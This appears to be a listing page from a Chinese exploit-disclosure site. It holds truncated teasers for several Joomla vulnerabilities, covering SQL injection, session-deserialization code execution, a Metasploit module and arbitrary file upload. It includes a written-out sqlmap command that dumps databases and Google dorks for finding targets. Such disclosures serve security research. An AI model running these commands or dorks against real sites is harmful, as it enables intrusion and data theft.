• Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

    Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinu...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:273次 | 标签:
  • Joomla远程代码执行详解

    Joomla远程代码执行详解
    朋友在群里发来的消息。 关于今天最新爆出的joomla 0day,经360研究人员分析发现,此为session 反序列代码执行高危漏洞。 代码分析: 此漏洞为session存储机制带来的安全隐患,在php中session是通过序列化存储的,且存储方式有:php、php_binary(php>5.44用php_serialize)、 wddx PHP默认安装设置session.serialize_handler的值是php,因此seesion的序列化格式为: 键名 + 竖线 + 经过 se...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:2,795次 | 标签:
  • Joomla SQL注入和远程代码执行漏洞

    Joomla SQL注入和远程代码执行漏洞
    发布日期:2015.11.21 通杀版本:3.2——3.4.4 CVE-2015-7297 CVE-2015-7857 CVE-2015-7858 相关Exp见代码 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ExcellentRanking     include Msf::Explo...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:3,487次 | 标签:,
  • Joomla SimpleImageUpload任意文件上传

    Joomla SimpleImageUpload任意文件上传
    # Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload # Google Dork: inurl:option=com_simpleimageupload # Date: 23.06.2015 # Version: 1.0 # Tested on: MsWin32   # Vuln Same to Com_Media Vulnerability   # Live Request :   POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1   Host: ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:4,469次 | 标签:
  • Joomla FormMaker组件注入漏洞

    Joomla FormMaker组件注入漏洞
    使用说明: python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs ###################################################################### # Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability # Google Dork: Y0ur Brain # Date: 28.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # V...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:2,590次 | 标签: